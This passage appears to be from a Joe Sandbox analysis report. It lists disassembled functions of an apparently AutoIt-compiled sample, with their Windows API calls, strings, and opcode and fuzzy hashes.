Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 2a695c29a84759a01d28b48246d100dc8f484d9cb21906d6b0cb11cad9514a49
Instruction ID: bfb37b85a68fdd5fa89b6e29868ecefd68416d9e849ee587d4ae14a1162bb247
Opcode Fuzzy Hash: 2a695c29a84759a01d28b48246d100dc8f484d9cb21906d6b0cb11cad9514a49
Instruction Fuzzy Hash: 1C213371205340AEEB119B3A9C09ABF7B9ADF49760F00812DF904CA2A1EB61CD419364

Function 0071B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

GetWindowLongW.USER32(?,000000F0), ref: 0071B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0071B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0071B1CF
GetSystemMetrics.USER32(00000004), ref: 0071B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00700E90,00000000), ref: 0071B216

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 7a679aa13fceccb98458b9ffa5a99049a051fdcc9ca84f4274f897c347b7b897
Instruction ID: 0f9702e459f3a37a47c9795b804a66d2447dd8fc5ed1e3856d1e089b95991e40
Opcode Fuzzy Hash: 7a679aa13fceccb98458b9ffa5a99049a051fdcc9ca84f4274f897c347b7b897
Instruction Fuzzy Hash: 63216B71A14655AFCB109F3C9C18AEA3BA5FB05361F158728F926D71E0E73898A09B90

Function 006E9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006E9320

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9352
__itow.LIBCMT ref: 006E936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9392
__itow.LIBCMT ref: 006E93A3

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 123c8a1f66b8ff7e9be54cabe5bc70a4daa57f8a08097436f3e463709948246f
Instruction ID: 6da03f272631a60a3836b9b4f9714acfb268f4ec0cae2526bff295a819ac61fa
Opcode Fuzzy Hash: 123c8a1f66b8ff7e9be54cabe5bc70a4daa57f8a08097436f3e463709948246f
Instruction Fuzzy Hash: 7021D731701348ABDB20AE659C86EEE7BAEEF48710F048029FD05DB2D1D6B08D4587A5

Function 00705A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00705A6E
GetForegroundWindow.USER32 ref: 00705A85
GetDC.USER32(00000000), ref: 00705AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00705ACD
ReleaseDC.USER32(00000000,00000003), ref: 00705B08

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5f67a58d10eb7a0e1fea354418614b388959fa519afc0efc0b7922e07fa694df
Instruction ID: 2a623f59e8a1c6e03bf53ffefb3d47ad9a8c30cff5d18a4ecdc69902b4d30d5b
Opcode Fuzzy Hash: 5f67a58d10eb7a0e1fea354418614b388959fa519afc0efc0b7922e07fa694df
Instruction Fuzzy Hash: 75218475A00504EFDB14EF69DC85AAABBE9EF48310F14C57DF84997392DA34AD00CB94

Function 006912F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
SelectObject.GDI32(?,00000000), ref: 0069135C
BeginPath.GDI32(?), ref: 00691373
SelectObject.GDI32(?,00000000), ref: 0069139C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2b301a6b46e1cd077eef0c8fcbda767cfe1daaace55ccab7c66369bfd5e469cb
Instruction ID: 99801f8cf0f0d8be3fb3401636df4c24a51ba84b6c9a6711c88b85704383ad9f
Opcode Fuzzy Hash: 2b301a6b46e1cd077eef0c8fcbda767cfe1daaace55ccab7c66369bfd5e469cb
Instruction Fuzzy Hash: 46215130810709EBDF108F19DD147E97BB9EB11322F24C216F8119A6B0D3B9A991DF58

Function 006F4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006F4ABA
__beginthreadex.LIBCMT ref: 006F4AD8
MessageBoxW.USER32(?,?,?,?), ref: 006F4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006F4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006F4B0A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 2ba40e38ef6418288a54d1a73e2cba456c3ca94c3b1445d1c0a468e8bfeec9b2
Instruction ID: b63aeb2ab0ef4ac5a815e64caf79c78f9ca96f7cc43932afdb7d88084bf3f8bc
Opcode Fuzzy Hash: 2ba40e38ef6418288a54d1a73e2cba456c3ca94c3b1445d1c0a468e8bfeec9b2
Instruction Fuzzy Hash: E11108B6905618BBD7018FAC9C04AEB7FADEB49321F14C269F914D3391DAB9CD0087A4

Function 006E8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E821E
GetLastError.KERNEL32(?,006E7CE2,?,?,?), ref: 006E8228
GetProcessHeap.KERNEL32(00000008,?,?,006E7CE2,?,?,?), ref: 006E8237
HeapAlloc.KERNEL32(00000000,?,006E7CE2,?,?,?), ref: 006E823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E8255

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ffc1156bfff9dc7c50cef5bf29c2443a732ef869cb58f93ecbe80ec8d1d44d18
Instruction ID: 2928097c11b3032855c3f238e1d37f8102f0ab1282e51372af439511e6d86a57
Opcode Fuzzy Hash: ffc1156bfff9dc7c50cef5bf29c2443a732ef869cb58f93ecbe80ec8d1d44d18
Instruction Fuzzy Hash: DA016D71201348BFDB204FAADC48DAB7BADEF8A754B508569F90DC3260DA318D00DAA0

Function 006E710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?,?,006E7455), ref: 006E7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?), ref: 006E7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E716C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 30181561ffd2dafda6b988f9c4595291de12f0ba29a4519f34e7f6e157125a96
Instruction ID: 069ca48e6bdd0da0ebd80abb82ff90d7b8a79ed13f357fba77e46c1ef9458b99
Opcode Fuzzy Hash: 30181561ffd2dafda6b988f9c4595291de12f0ba29a4519f34e7f6e157125a96
Instruction Fuzzy Hash: 7B018F76612304BBDB118F69DC44BEA7BAEEF45791F188064FD08D3260E735DD419BA0

Function 006F5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 129940652b9d850a88f451aba6a68e42befdbf057b405968b3e7d379676dab01
Instruction ID: 5d6d4daf0d7d81cd707096d3dec822048b5c8160c863680dce32c6abe9acba6a
Opcode Fuzzy Hash: 129940652b9d850a88f451aba6a68e42befdbf057b405968b3e7d379676dab01
Instruction Fuzzy Hash: 06012131D01A1DEBCF00EFE8D8495FDBB79FB0D711F418255D646B2281CB345A5097A5

Function 006E810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8157

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1815d7d2d36fa9f89cb3d04e3d26aa7868fca0f39210839ba56e7f91eb6a52f6
Instruction ID: e34d73919b83dbed38e84c8a9c00c9e7768fa19abda9f72a4ca54a8966435b29
Opcode Fuzzy Hash: 1815d7d2d36fa9f89cb3d04e3d26aa7868fca0f39210839ba56e7f91eb6a52f6
Instruction Fuzzy Hash: 67F0C270211305BFEB110FA9EC88EE73BADFF49754B008025F949C3290CB649D01EA60

Function 006EC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 006EC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 006EC20E
MessageBeep.USER32(00000000), ref: 006EC226
KillTimer.USER32(?,0000040A), ref: 006EC242
EndDialog.USER32(?,00000001), ref: 006EC25C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: eea5710c76a25a8a0586afbd2c41d49a4cfa654ef890691e4706fb283dc2e9e6
Instruction ID: d26c7a333f2fc5a14e1b94cb56b820997dc2693bbb5485adb80fe2a94968b1a6
Opcode Fuzzy Hash: eea5710c76a25a8a0586afbd2c41d49a4cfa654ef890691e4706fb283dc2e9e6
Instruction Fuzzy Hash: A101D630514B04ABEB245B69ED4EFD677B9FF00B16F008269F642A14E0DBF46A458B94

Function 006913B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006913BF
StrokeAndFillPath.GDI32(?,?,006CB888,00000000,?), ref: 006913DB
SelectObject.GDI32(?,00000000), ref: 006913EE
DeleteObject.GDI32 ref: 00691401
StrokePath.GDI32(?), ref: 0069141C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 291acff922e29950927bd9431a2998ffd214c19441c3d69c94f1b9e8c6113a78
Instruction ID: 12e0f20f96c7ae02464f22da3bbe3a5dcb828ff9f1e8d5d5b63a5d0c87b83f7b
Opcode Fuzzy Hash: 291acff922e29950927bd9431a2998ffd214c19441c3d69c94f1b9e8c6113a78
Instruction Fuzzy Hash: 87F01930000B49EBDF115F2AEC5C7E83BE9A725326F18C324E42A485F1C77999A5DF18

Function 006FC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006FC432
CoCreateInstance.OLE32(00722D6C,00000000,00000001,00722BDC,?), ref: 006FC44A

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

CoUninitialize.OLE32 ref: 006FC6B7

Strings

.lnk, xrefs: 006FC3C6, 006FC3EE, 006FC3F8

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 2b26a9244d4757b093f11d45844ea0dafc8acc38ae6de3aeb615e714623d75c2
Instruction ID: 9098daea968386b7153bf33a3113203d421a6e9a663c937d64351817f4f7f63e
Opcode Fuzzy Hash: 2b26a9244d4757b093f11d45844ea0dafc8acc38ae6de3aeb615e714623d75c2
Instruction Fuzzy Hash: 28A15BB1108205AFDB40EF64C881EAFB7EDEF85354F00491DF156871A2EB71EA09CB66

Function 006A2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 00697A51: _memmove.LIBCMT ref: 00697AAB

__swprintf.LIBCMT ref: 006A2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 006A2D66

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 4d35a581ee937a6a5ece32783d517dae6cfa384cca677448694659aa61f824c2
Instruction ID: 1f066a78372df5703184fb45f8b7a805c7d0b83365c986e3d3dc21c0e4216109
Opcode Fuzzy Hash: 4d35a581ee937a6a5ece32783d517dae6cfa384cca677448694659aa61f824c2
Instruction Fuzzy Hash: A7917C715182029FCB54FF28C895CAFB7AAEF96310F00491EF4469B2A1EB30ED45CB56

Function 006FB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770

CoInitialize.OLE32(00000000), ref: 006FB9BB
CoCreateInstance.OLE32(00722D6C,00000000,00000001,00722BDC,?), ref: 006FB9D4
CoUninitialize.OLE32 ref: 006FB9F1

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

Strings

.lnk, xrefs: 006FB99D, 006FB9AB

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: deb1d15a28ba2a67be687d7d06a4b58b60f269f6a36fda3420c149d10b42fdf5
Instruction ID: 82ecb63bb3554d2891664820a949df073a919cbed0f2a643ff28871eb42f9182
Opcode Fuzzy Hash: deb1d15a28ba2a67be687d7d06a4b58b60f269f6a36fda3420c149d10b42fdf5
Instruction Fuzzy Hash: A6A134756042059FCB00DF28C885D6AB7EAFF89314F04899CF9999B3A1DB31ED46CB91

Function 006EB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 006EB4BE

Strings

Container, xrefs: 006EB43B
AutoIt3GUI, xrefs: 006EB436
%r, xrefs: 006EB561

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%r
API String ID: 3565006973-1282070598
Opcode ID: 84a4b142e25a67ce2acc2046ebb05d820e405d3cdb9d6ae3ed9084a770bb16ee
Instruction ID: eceb78ae972e25dea6705c53e41a77154c8abf3f7627b82e0f00e4689d4df833
Opcode Fuzzy Hash: 84a4b142e25a67ce2acc2046ebb05d820e405d3cdb9d6ae3ed9084a770bb16ee
Instruction Fuzzy Hash: 529138B0601701AFDB54DF65C885AABBBEAFF48710F20956DE94ACB391DB70E841CB50

Function 006B501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006B50AD

Part of subcall function 006C00F0: __87except.LIBCMT ref: 006C012B

Strings

pow, xrefs: 006B5085, 006B50A2

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f1fa5ad4848123a1400c61b36bef296405c95ec1ce5ecd82dc1346df619ca532
Instruction ID: ed8463161a211f0e49decefeb4d971958bc114ca3151fa0b1b0a2fe70d97dcae
Opcode Fuzzy Hash: f1fa5ad4848123a1400c61b36bef296405c95ec1ce5ecd82dc1346df619ca532
Instruction Fuzzy Hash: D9514BB1908601C6EB217728C9057FE6B97DB40710F24895DE4D7863A9EF388AC5978A

Function 006D8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006D862B
_memmove.LIBCMT ref: 006D8685

Strings

3cj, xrefs: 006D860C
_j, xrefs: 006D86FF, 006DDFDC, 006DDFF8

